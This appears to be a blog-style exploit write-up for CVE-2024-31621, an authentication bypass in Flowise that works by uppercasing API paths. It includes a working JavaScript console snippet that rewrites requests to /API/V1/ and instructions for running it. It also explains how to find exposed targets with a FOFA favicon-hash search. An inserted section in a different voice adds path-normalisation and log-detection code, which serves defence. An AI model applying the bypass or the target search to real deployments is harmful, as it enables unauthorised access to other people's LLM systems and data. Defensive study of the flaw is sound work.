CVE-2024-31621

Flowise <= 1.6.5 authentication bypass

Flowise is an open source low-code tool for developers to build customized LLM orchestration flows & AI agents. Basically, the server doesn't check authentication for requests to the uppercase endpoint /API/V1. We just have to rewrite all ajax request endpoints to their uppercase version, and we'll do this client side. Here's the JavaScript code taken from my gist:

    var req = XMLHttpRequest.prototype.open;
    XMLHttpRequest.prototype.open = function(method, url) {
        // rewrite the path prefix before the request is opened
        arguments[1] = url.replace('/api/v1/', '/API/V1/');
        return req.apply(this, arguments);
    };

To use this, navigate to a page that does not require authentication (e.g. /tools), then paste this code into the dev tools console. Congratulations! This will last until you reload the page manually.
[*] flowise_authbypass.png
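As an added illustration (not Flowise's own code), here is a simplified model of the bug class described above: an auth gate that compares the raw path against the lowercase prefix while the router matches case-insensitively, the hardened form that normalises the path first, and a log check that surfaces requests which only reach the API under normalisation. Endpoint names and log lines are constructed placeholders.

```javascript
// Weak gate: only paths starting with the exact lowercase prefix get an auth
// check. A router that matches case-insensitively (the Express default) will
// still serve /API/V1/... without the request ever being challenged.
function weakRequiresAuth(pathname) {
  return pathname.startsWith('/api/v1/');
}

// Hardened gate: percent-decode, case-fold and collapse duplicate slashes
// before comparing, so every spelling of the prefix is treated alike.
// Mounting the auth middleware on the API router itself is the more robust
// fix, since it then covers every route the router serves.
function normalizePath(pathname) {
  let p;
  try { p = decodeURIComponent(pathname); } catch (e) { p = pathname; }
  return p.toLowerCase().replace(/\/+/g, '/');
}
function hardenedRequiresAuth(pathname) {
  return normalizePath(pathname).startsWith('/api/v1/');
}

// Detection: given access-log lines in a constructed minimal format
// "<ip> <METHOD> <path> <status>", return the lines whose path is an API
// path only after normalisation, i.e. the weak gate would have let them by.
function findCaseBypassRequests(logLines) {
  return logLines.filter(line => {
    const path = line.split(' ')[2] || '';
    return hardenedRequiresAuth(path) && !weakRequiresAuth(path);
  });
}

// Constructed sample log lines (not real traffic; endpoint names are placeholders).
const SAMPLE_LOG = [
  '203.0.113.5 GET /api/v1/example 401',
  '203.0.113.5 GET /API/V1/example 200',
  '198.51.100.7 GET /Api/v1/other 200',
  '198.51.100.7 GET /tools 200',
];

console.log(findCaseBypassRequests(SAMPLE_LOG)); // flags the two mixed-case API hits
```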

Looking for vulnerable targets

Its favicon hash is -2051052918; knowing this, we just have to search for it on FOFA, which gives us more than 6k results.
[*] fofa_results.png
By the way, most of these results don't even have a login, bruh. This is because AI has been a hot topic these last years, so inexperienced people and companies will find a way to use an LLM for anything, appropriate or not.